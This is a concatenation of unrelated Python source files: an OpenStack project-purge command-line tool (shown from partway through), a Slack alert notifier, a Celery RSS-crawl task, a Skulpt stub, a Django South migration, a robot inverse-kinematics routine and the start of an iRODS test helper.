        return "Firewall {} (id {})".format(firewall['name'], firewall['id'])
class NovaServers(Resources):
    """Manage nova resources"""
    # Fix: the docstring above sat after __init__ as a stray no-op string
    # statement; moved to the proper class-docstring position.

    def __init__(self, session):
        super(NovaServers, self).__init__(session)
        # The nova client re-authenticates with the stored credentials
        # rather than reusing the session token.
        self.client = nova_client.Client(
            session.username, session.password,
            session.project_name, auth_url=session.auth_url,
            endpoint_type=session.endpoint_type,
            region_name=session.region_name, insecure=session.insecure)
        self.project_id = session.project_id

    def list(self):
        return self.client.servers.list()

    def delete(self, server):
        super(NovaServers, self).delete(server)
        self.client.servers.delete(server)

    def resource_str(self, server):
        return "server {} (id {})".format(server.name, server.id)
class GlanceImages(Resources):
    def __init__(self, session):
        # Glance accepts the already-obtained token directly.
        self.client = glance_client.Client(
            endpoint=session.get_endpoint("image"),
            token=session.token, insecure=session.insecure)
        self.project_id = session.project_id

    def list(self):
        images = self.client.images.list(owner=self.project_id)
        return filter(self._owned_resource, images)

    def delete(self, image):
        super(GlanceImages, self).delete(image)
        self.client.images.delete(image.id)

    def resource_str(self, image):
        return "image {} (id {})".format(image.name, image.id)

    def _owned_resource(self, res):
        # Only considering resources owned by project
        return res.owner == self.project_id
class HeatStacks(Resources):
    """Lists and removes the heat stacks of the project."""

    def __init__(self, session):
        self.client = heat_client.Client(
            "1",
            endpoint=session.get_endpoint("orchestration"),
            token=session.token, insecure=session.insecure)
        self.project_id = session.project_id

    def list(self):
        """Return the heat stacks visible to the session."""
        return self.client.stacks.list()

    def delete(self, stack):
        """Delete (or abandon) *stack* after the base-class delete hook.

        A stack stuck in DELETE_FAILED is abandoned instead of deleted
        again, since a plain delete already failed once.
        """
        super(HeatStacks, self).delete(stack)
        if stack.stack_status == "DELETE_FAILED":
            self.client.stacks.abandon(stack.id)
        else:
            self.client.stacks.delete(stack.id)

    def resource_str(self, stack):
        """Return a one-line human-readable description of *stack*."""
        # FIX: message previously contained an unbalanced ')' ("stack {})").
        return "stack {}".format(stack.id)
class CeilometerAlarms(Resources):
    """Lists and removes the ceilometer alarms of the project."""

    def __init__(self, session):
        # Ceilometer Client needs a method that returns the token
        def token_getter():
            return session.token
        self.client = ceilometer_client.Client(
            auth_url=session.auth_url,
            endpoint=session.get_endpoint("metering"),
            token=token_getter, insecure=session.insecure)
        self.project_id = session.project_id

    def list(self):
        # Server-side filter: only alarms of this project.
        by_project = [{'field': 'project_id',
                       'op': 'eq',
                       'value': self.project_id}]
        return self.client.alarms.list(q=by_project)

    def delete(self, alarm):
        # Base-class hook first, then the actual API removal.
        super(CeilometerAlarms, self).delete(alarm)
        self.client.alarms.delete(alarm.alarm_id)

    def resource_str(self, alarm):
        """Return a one-line human-readable description of *alarm*."""
        return "alarm {}".format(alarm.name)
class KeystoneManager(object):
    """Manages Keystone queries."""

    def __init__(self, username, password, project, auth_url, insecure, **kwargs):
        self.client = keystone_client.Client(
            username=username, password=password,
            tenant_name=project, auth_url=auth_url,
            insecure=insecure, **kwargs)
        # Lazily resolved and memoized by get_admin_role_id().
        self.admin_role_id = None
        # Cached tenant record of the project being worked on.
        self.tenant_info = None

    def get_project_id(self, project_name_or_id=None):
        """Get a project by its id

        Returns:
        * ID of current project if called without parameter,
        * ID of project given as parameter if one is given.
        """
        if project_name_or_id is None:
            return self.client.tenant_id
        try:
            self.tenant_info = self.client.tenants.get(project_name_or_id)
            # No NotFound raised, so project_name_or_id already was
            # the project's id.
            project_id = project_name_or_id
        except api_exceptions.NotFound:
            try:
                # Can raise api_exceptions.Forbidden:
                tenants = self.client.tenants.list()
                matching = [tenant for tenant in tenants
                            if tenant.name == project_name_or_id]
                project_id = matching[0].id
            except IndexError:
                raise NoSuchProject(project_name_or_id)
        if not self.tenant_info:
            self.tenant_info = self.client.tenants.get(project_id)
        return project_id

    def enable_project(self, project_id):
        """Mark the project as enabled in Keystone."""
        logging.info("* Enabling project {}.".format(project_id))
        self.tenant_info = self.client.tenants.update(project_id, enabled=True)

    def disable_project(self, project_id):
        """Mark the project as disabled in Keystone."""
        logging.info("* Disabling project {}.".format(project_id))
        self.tenant_info = self.client.tenants.update(project_id, enabled=False)

    def get_admin_role_id(self):
        """Return (and memoize) the id of the role named "admin"."""
        if not self.admin_role_id:
            all_roles = self.client.roles.list()
            self.admin_role_id = [role for role in all_roles
                                  if role.name == "admin"][0].id
        return self.admin_role_id

    def become_project_admin(self, project_id):
        """Grant the current user the admin role on the given project."""
        current_user = self.client.user_id
        role_id = self.get_admin_role_id()
        logging.info("* Granting role admin to user {} on project {}.".format(
            current_user, project_id))
        return self.client.roles.add_user_role(current_user, role_id, project_id)

    def undo_become_project_admin(self, project_id):
        """Remove the admin role from the current user on the given project."""
        current_user = self.client.user_id
        role_id = self.get_admin_role_id()
        logging.info("* Removing role admin to user {} on project {}.".format(
            current_user, project_id))
        return self.client.roles.remove_user_role(current_user, role_id, project_id)

    def delete_project(self, project_id):
        """Delete the project itself from Keystone."""
        logging.info("* Deleting project {}.".format(project_id))
        self.client.tenants.delete(project_id)
def perform_on_project(admin_name, password, project, auth_url,
                       endpoint_type='publicURL', region_name=None,
                       action='dump', insecure=False):
    """Perform provided action on all resources of project.

    action can be: 'purge' or 'dump'
    """
    session = Session(admin_name, password, project, auth_url,
                      endpoint_type, region_name, insecure)
    error = None
    # Instantiate each resource-manager class listed (by name) in
    # RESOURCES_CLASSES and either dump or purge everything it manages.
    for rc in RESOURCES_CLASSES:
        try:
            resources = globals()[rc](session)
            res_actions = {'purge': resources.purge,
                           'dump': resources.dump}
            res_actions[action]()
        except (EndpointNotFound,
                keystoneclient.openstack.common.apiclient.exceptions.EndpointNotFound,
                neutronclient.common.exceptions.EndpointNotFound,
                cinderclient.exceptions.EndpointNotFound,
                novaclient.exceptions.EndpointNotFound,
                heatclient.openstack.common.apiclient.exceptions.EndpointNotFound,
                ResourceNotEnabled):
            # If service is not in Keystone's services catalog, ignoring it
            pass
        except requests.exceptions.MissingSchema as e:
            logging.warning(
                'Some resources may not have been deleted, "{!s}" is '
                'improperly configured and returned: {!r}\n'.format(rc, e))
        except (ceilometerclient.exc.InvalidEndpoint, glanceclient.exc.InvalidEndpoint) as e:
            logging.warning(
                "Unable to connect to {} endpoint : {}".format(rc, e.message))
            # Remember the failure but keep processing the other resources.
            error = InvalidEndpoint(rc)
        except (neutronclient.common.exceptions.NeutronClientException):
            # If service is not configured, ignoring it
            pass
    # Re-raise the last endpoint error so the caller knows the run was partial.
    if error:
        raise error
class EnvDefault(argparse.Action):
    """argparse action whose default can be supplied by an environment variable.

    When *envvar* is present in the environment it overrides the static
    default, and a truthy default lifts the ``required`` constraint.
    """

    def __init__(self, envvar, required=True, default=None, **kwargs):
        # Overriding default with environment variable if available
        default = os.environ.get(envvar, default)
        if required and default:
            required = False
        super(EnvDefault, self).__init__(default=default, required=required,
                                         **kwargs)

    def __call__(self, parser, namespace, values, option_string=None):
        setattr(namespace, self.dest, values)
def parse_args():
    """Build the CLI parser, parse sys.argv and validate the combination.

    Exactly one of --cleanup-project / --own-project must be supplied.
    """
    desc = "Purge resources from an Openstack project."
    parser = argparse.ArgumentParser(description=desc)
    parser.add_argument("--verbose", action="store_true",
                        help="Makes output verbose")
    parser.add_argument("--dry-run", action="store_true",
                        help="List project's resources")
    parser.add_argument("--dont-delete-project", action="store_true",
                        help="Executes cleanup script without removing the project. "
                        "Warning: all project resources will still be deleted.")
    parser.add_argument("--region-name", action=EnvDefault, required=False,
                        envvar='OS_REGION_NAME', default=None,
                        help="Region to use. Defaults to env[OS_REGION_NAME] "
                        "or None")
    parser.add_argument("--endpoint-type", action=EnvDefault,
                        envvar='OS_ENDPOINT_TYPE', default="publicURL",
                        help="Endpoint type to use. Defaults to "
                        "env[OS_ENDPOINT_TYPE] or publicURL")
    parser.add_argument("--username", action=EnvDefault,
                        envvar='OS_USERNAME', required=True,
                        help="If --own-project is set : a user name with access to the "
                        "project being purged. If --cleanup-project is set : "
                        "a user name with admin role in project specified in --admin-project. "
                        "Defaults to env[OS_USERNAME]")
    parser.add_argument("--password", action=EnvDefault,
                        envvar='OS_PASSWORD', required=True,
                        help="The user's password. Defaults "
                        "to env[OS_PASSWORD].")
    parser.add_argument("--admin-project", action=EnvDefault,
                        envvar='OS_TENANT_NAME', required=True,
                        help="Project name used for authentication. This project "
                        "will be purged if --own-project is set. "
                        "Defaults to env[OS_TENANT_NAME].")
    parser.add_argument("--auth-url", action=EnvDefault,
                        envvar='OS_AUTH_URL', required=True,
                        help="Authentication URL. Defaults to "
                        "env[OS_AUTH_URL].")
    parser.add_argument("--cleanup-project", required=False, default=None,
                        help="ID or Name of project to purge. Not required "
                        "if --own-project has been set. Using --cleanup-project "
                        "requires to authenticate with admin credentials.")
    parser.add_argument("--own-project", action="store_true",
                        help="Delete resources of the project used to "
                        "authenticate. Useful if you don't have the "
                        "admin credentials of the platform.")
    parser.add_argument("--insecure", action="store_true",
                        help="Explicitly allow all OpenStack clients to perform "
                        "insecure SSL (https) requests. The server's "
                        "certificate will not be verified against any "
                        "certificate authorities. This option should be "
                        "used with caution.")
    args = parser.parse_args()
    # Cross-option validation: one (and only one) purge target selector.
    if not (args.cleanup_project or args.own_project):
        parser.error('Either --cleanup-project '
                     'or --own-project has to be set')
    if args.cleanup_project and args.own_project:
        parser.error('Both --cleanup-project '
                     'and --own-project can not be set')
    return args
def main():
    """Entry point: authenticate, then dump or purge the target project.

    Exits with a dedicated error code on authentication, authorization,
    missing-project, connection or deletion failures.
    """
    args = parse_args()
    if args.verbose:
        logging.basicConfig(level=logging.INFO)
    else:
        # Set default log level to Warning
        logging.basicConfig(level=logging.WARNING)
    try:
        keystone_manager = KeystoneManager(args.username, args.password,
                                           args.admin_project, args.auth_url,
                                           args.insecure, region_name=args.region_name)
    except api_exceptions.Unauthorized as exc:
        print("Authentication failed: {}".format(str(exc)))
        sys.exit(AUTHENTICATION_FAILED_ERROR_CODE)
    remove_admin_role_after_purge = False
    disable_project_after_purge = False
    try:
        cleanup_project_id = keystone_manager.get_project_id(
            args.cleanup_project)
        if not args.own_project:
            # Purging someone else's project: temporarily grant ourselves
            # the admin role on it (and undo afterwards).
            try:
                keystone_manager.become_project_admin(cleanup_project_id)
            except api_exceptions.Conflict:
                # user was already admin on the target project.
                pass
            else:
                remove_admin_role_after_purge = True
            # If the project was enabled before the purge, do not disable it after the purge
            disable_project_after_purge = not keystone_manager.tenant_info.enabled
            if disable_project_after_purge:
                # The project is currently disabled so we need to enable it
                # in order to delete resources of the project
                keystone_manager.enable_project(cleanup_project_id)
    except api_exceptions.Forbidden as exc:
        print("Not authorized: {}".format(str(exc)))
        sys.exit(NOT_AUTHORIZED)
    except NoSuchProject as exc:
        print("Project {} doesn't exist".format(str(exc)))
        sys.exit(NoSuchProject.ERROR_CODE)
    # Proper cleanup
    try:
        action = "dump" if args.dry_run else "purge"
        perform_on_project(args.username, args.password, cleanup_project_id,
                           args.auth_url, args.endpoint_type, args.region_name,
                           action, args.insecure)
    except requests.exceptions.ConnectionError as exc:
        print("Connection error: {}".format(str(exc)))
        sys.exit(CONNECTION_ERROR_CODE)
    except (DeletionFailed, InvalidEndpoint) as exc:
        print("Deletion of {} failed".format(str(exc)))
        print("*Warning* Some resources may not have been cleaned up")
        sys.exit(DeletionFailed.ERROR_CODE)
    if (not args.dry_run) and (not args.dont_delete_project) and (not args.own_project):
        keystone_manager.delete_project(cleanup_project_id)
    else:
        # Project is not deleted, we may want to disable the project
        # this must happen before we remove the admin role
        if disable_project_after_purge:
            keystone_manager.disable_project(cleanup_project_id)
        # We may also want to remove ourself from the purged project
        if remove_admin_role_after_purge:
            keystone_manager.undo_become_project_admin(cleanup_project_id)
    sys.exit(0)
# Script entry point.
if __name__ == "__main__":
    main()
|
from typing import List, Dict, Optional, Any
import aiohttp
import json
import jinja2
from irisett import (
log
)
async def send_slack_notification(url: str, attachments: List[Dict]):
    """POST the given attachments to a Slack incoming-webhook URL.

    Delivery is best-effort: HTTP and client errors are logged, never raised.
    :param url: the Slack webhook URL
    :param attachments: list of Slack attachment dicts
    """
    data = {
        'attachments': attachments
    }
    try:
        async with aiohttp.ClientSession() as session:
            async with session.post(url, data=json.dumps(data), timeout=30) as resp:
                if resp.status != 200:
                    # FIX: log tag was 'NOTIFICATION' here while every other
                    # log call in this module uses 'NOTIFICATIONS'.
                    log.msg('Error sending slack notification: http status %s' % (str(resp.status)),
                            'NOTIFICATIONS')
    except aiohttp.ClientError as e:
        log.msg('Error sending slack notification: %s' % (str(e)), 'NOTIFICATIONS')
async def send_alert_notification(settings: Dict, tmpl_args: Dict):
    """Render the configured templates into one Slack attachment and send it.

    :param settings: dict produced by parse_settings (compiled templates)
    :param tmpl_args: values passed to the jinja2 templates
    """
    rendered_msg = settings['tmpl-msg'].render(**tmpl_args)
    attachment = {
        'fallback': rendered_msg,
        'pretext': rendered_msg,
        'fields': [],
    }
    # Optional fields, in a fixed order: Duration first, then URL.
    for title, tmpl_key in (('Duration', 'tmpl-duration'), ('URL', 'tmpl-url')):
        if settings[tmpl_key]:
            attachment['fields'].append({
                'title': title,
                'value': settings[tmpl_key].render(**tmpl_args),
                'short': False,
            })
    await send_slack_notification(settings['webhook-url'], [attachment])
def parse_settings(config: Any) -> Optional[Dict[str, Any]]:
    """Read the Slack notification settings from *config*.

    Returns a dict with the webhook URL and compiled jinja2 templates,
    or None when the mandatory settings are missing.
    """
    ret = {
        'webhook-url': config.get('slack-webhook-url'),
        'tmpl-msg': config.get('slack-tmpl-msg'),
        'tmpl-duration': config.get('slack-tmpl-duration', fallback=''),
        'tmpl-url': config.get('slack-tmpl-url', fallback='')
    }  # type: Any
    # Webhook URL and message template are mandatory.
    if not ret['webhook-url'] or not ret['tmpl-msg']:
        log.debug('Slack settings missing, no slack notifications will be sent', 'NOTIFICATIONS')
        return None
    log.debug('Valid slack notification settings found', 'NOTIFICATIONS')
    # Compile the non-empty templates once, up front.
    for key in ('tmpl-msg', 'tmpl-duration', 'tmpl-url'):
        if ret[key]:
            ret[key] = jinja2.Template(ret[key])
    return ret
|
from celery.schedules import crontab
from celery.task import periodic_task
from celery.utils.log import get_task_logger
from Crawler.utils import run_crawler
logger = get_task_logger(__name__)
__author__ = 'nolram'
@periodic_task(
    run_every=(crontab(minute='*/15')),
    name="crawling_news_rss",
    ignore_result=True
)
def do_crawling():
    """Celery periodic task: crawl the RSS news sources every 15 minutes."""
    run_crawler()
    logger.info("Crawling News Concluido")
|
# Stub module: importing it always fails because Skulpt has no
# implementation of the `command` module.
raise NotImplementedError("command is not yet implemented in Skulpt")
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South migration: add the auto-updated ``last_update`` field to Event."""

    def forwards(self, orm):
        # Adding field 'Event.last_update'
        db.add_column('multilingual_events_event', 'last_update',
                      self.gf('django.db.models.fields.DateTimeField')(auto_now=True, default=datetime.datetime(2013, 2, 25, 0, 0), blank=True),
                      keep_default=False)

    def backwards(self, orm):
        # Deleting field 'Event.last_update'
        db.delete_column('multilingual_events_event', 'last_update')

    # Frozen ORM snapshot used by South to reconstruct the models as they
    # existed at the time of this migration. Auto-generated; do not edit.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'cms.cmsplugin': {
            'Meta': {'object_name': 'CMSPlugin'},
            'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 2, 25, 0, 0)'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
            'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
            'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
            'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
            'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
            'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
        },
        'cms.placeholder': {
            'Meta': {'object_name': 'Placeholder'},
            'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'document_library.document': {
            'Meta': {'ordering': "('position', '-creation_date')", 'object_name': 'Document'},
            'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['document_library.DocumentCategory']", 'null': 'True', 'blank': 'True'}),
            'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'download_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_on_front_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'position': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
            'source_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
        },
        'document_library.documentcategory': {
            'Meta': {'object_name': 'DocumentCategory'},
            'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '32'})
        },
        'multilingual_events.event': {
            'Meta': {'ordering': "('start_date',)", 'object_name': 'Event'},
            'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['multilingual_events.EventCategory']"}),
            'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
            'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
            'end_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'placeholders': ('djangocms_utils.fields.M2MPlaceholderField', [], {'to': "orm['cms.Placeholder']", 'symmetrical': 'False'}),
            'start_date': ('django.db.models.fields.DateField', [], {}),
            'start_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
            'timezone': ('django.db.models.fields.CharField', [], {'max_length': '65', 'blank': 'True'}),
            'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
            'url_name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
        },
        'multilingual_events.eventagendaday': {
            'Meta': {'object_name': 'EventAgendaDay', 'db_table': "'cmsplugin_eventagendaday'", '_ormbases': ['cms.CMSPlugin']},
            'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
            'date': ('django.db.models.fields.DateField', [], {}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
        },
        'multilingual_events.eventagendasession': {
            'Meta': {'object_name': 'EventAgendaSession', 'db_table': "'cmsplugin_eventagendasession'", '_ormbases': ['cms.CMSPlugin']},
            'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'max_length': '4000', 'blank': 'True'}),
            'document': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['document_library.Document']", 'null': 'True', 'blank': 'True'}),
            'end_time': ('django.db.models.fields.DateTimeField', [], {}),
            'start_time': ('django.db.models.fields.DateTimeField', [], {}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
        },
        'multilingual_events.eventagendatalk': {
            'Meta': {'object_name': 'EventAgendaTalk', 'db_table': "'cmsplugin_eventagendatalk'", '_ormbases': ['cms.CMSPlugin']},
            'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'max_length': '4000', 'blank': 'True'}),
            'document': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['document_library.Document']", 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
        },
        'multilingual_events.eventcategory': {
            'Meta': {'object_name': 'EventCategory'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'position': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
            'slug': ('django.db.models.fields.CharField', [], {'max_length': '32'})
        },
        'multilingual_events.eventcategorytitle': {
            'Meta': {'object_name': 'EventCategoryTitle'},
            'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['multilingual_events.EventCategory']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
        },
        'multilingual_events.eventtitle': {
            'Meta': {'object_name': 'EventTitle'},
            'address': ('django.db.models.fields.TextField', [], {'max_length': '2000', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'event': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['multilingual_events.Event']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
            'room': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '512'})
        }
    }

    complete_apps = ['multilingual_events']
|
import numpy as np
def robotBoschikt(robot, pos):
    """
    Inverse kinematic task for robot Bosch.

    :param robot: Robot Bosch instance (provides link lengths ``L1``, ``L2``).
    :param pos: Coordinates of robot position in world coordinates
        (assumes [x, y, z, phi] ordering — pos[2]/pos[3] map directly to
        joints 3/4; TODO confirm against caller).
    :return: 2x4 array with the two joint-space solutions in degrees,
        or [] when the target is out of reach.
    """
    pos = np.array(pos).astype(float)
    c = np.sqrt(pos[0] ** 2 + pos[1] ** 2)
    # Law-of-cosines argument for the elbow joint; |v| > 1 means unreachable.
    v = (c ** 2 - robot.L1 ** 2 - robot.L2 ** 2) / (2 * robot.L1 * robot.L2)
    if abs(v) > 1.0:
        return []
    b = np.arccos(v) * 180.0 / np.pi
    g = np.arccos((c ** 2 + robot.L1 ** 2 - robot.L2 ** 2) / (2 * robot.L1 * c)) * 180.0 / np.pi
    if pos[0] == 0:
        # x == 0 would divide by zero below; the base angle is +/-90 degrees.
        d = 90.0 * np.sign(pos[1])
    else:
        d = np.arctan(pos[1] / pos[0]) * np.sign(pos[0]) * 180.0 / np.pi
    # Two solutions (elbow-up / elbow-down), one per row.
    deg = np.empty((2, 4))
    deg[0, 3] = pos[3]
    deg[0, 2] = -pos[2]
    deg[0, 1] = b
    deg[0, 0] = 90.0 - d - g
    deg[1, 3] = pos[3]
    deg[1, 2] = -pos[2]
    deg[1, 1] = -b
    deg[1, 0] = 90.0 - d + g
    if pos[0] != 0:
        deg[:, :2] = deg[:, :2] * np.sign(pos[0])
        if pos[0] < 0:
            # BUG FIX: the original swap (`p = deg[0, :]; deg[0, :] = deg[1, :];
            # deg[1, :] = p`) used a numpy *view* for `p`, so both rows ended up
            # equal to the old row 1. Swap the rows via fancy indexing instead.
            deg[[0, 1], :] = deg[[1, 0], :]
    return deg
|
import atexit
import logging
import os
import platform
import subprocess
from enum import Enum, unique
from tempfile import mkdtemp
import re
import shutil
from typing import List, Union, Dict, Set
from uuid import uuid4
from useintest.modules.irods.models import IrodsResource, IrodsUser, Version
@unique
class AccessLevel(Enum):
    """
    Entity access levels available in iRODS.

    The member values are the literal level names understood by `ichmod`.
    """
    NONE = "null"   # iRODS calls the no-access level "null"
    READ = "read"
    WRITE = "write"
    OWN = "own"
class IrodsSetupHelper:
    """
    Helper for setting up tests using iRODS.
    """
    def __init__(self, icommands_location: str):
        """
        Constructor.
        :param icommands_location: the location of the icommands that can be used to communicate with the iRODS server
        """
        self.icommands_location = icommands_location

    def create_data_object(self, name: str, contents: str="") -> str:
        """
        Creates a test data object on iRODS with the given name and contents.
        :param name: the name of the file to create
        :param contents: the contents of the file to create
        :return: the path to the created file
        """
        if "/" in name:
            raise ValueError("Data object name cannot include '/'")

        # TODO: Consider using `TempManager` from `hgicommon` instead
        def remove_temp_folder(location: str):
            # Best-effort cleanup: OSError (e.g. permissions) is ignored.
            if os.path.exists(location):
                try:
                    shutil.rmtree(location)
                except OSError:
                    pass

        temp_root = None
        if platform.system() == "Darwin":
            # The temp directory on a Mac machine is somewhere that cannot be bind mounted by Docker using default
            # settings. /tmp can however
            temp_root = "/tmp"
        temp_directory_path = mkdtemp(dir=temp_root)
        # Registered so the folder is removed even if `iput` below fails;
        # unregistered again once the manual cleanup has run.
        atexit.register(remove_temp_folder, temp_directory_path)
        temp_file_path = os.path.join(temp_directory_path, name)
        os.chmod(temp_directory_path, 0o770)
        with open(temp_file_path, "w+") as temp_file:
            temp_file.write(contents)
        os.chmod(temp_file_path, 0o770)
        self.run_icommand(["iput", temp_file_path])
        remove_temp_folder(temp_directory_path)
        atexit.unregister(remove_temp_folder)
        return "%s/%s" % (self.run_icommand(["ipwd"]), name)

    def read_data_object(self, path: str) -> str:
        """
        Reads the contents of the entity with the given path.
        :param path: the path to the entity in iRODS
        :return: the entity's contents
        """
        # `iget ... -` writes the object to stdout.
        return self.run_icommand(["iget", path, "-"])

    def replicate_data_object(self, path: str, replicate_to: Union[str, IrodsResource]):
        """
        Replicates the data object in the given path to the given resource.
        :param path: the path of the data object that is to be replicated
        :param replicate_to: the resource or name of the resource to which the data object should be replicated to
        """
        if isinstance(replicate_to, IrodsResource):
            replicate_to = replicate_to.name
        self.run_icommand(["irepl", "-R", replicate_to, path])

    def create_collection(self, name: str) -> str:
        """
        Creates a test collection on iRODS with the given name and contents.
        :param name: the name of the collection to create
        :return: the path to the created collection
        """
        if "/" in name:
            raise ValueError("Collection name cannot include '/'")
        self.run_icommand(["imkdir", name])
        return "%s/%s" % (self.run_icommand(["ipwd"]), name)

    def add_metadata_to(self, path: str, metadata: Dict):
        """
        Adds the given metadata to the entity at the given path in iRODS.
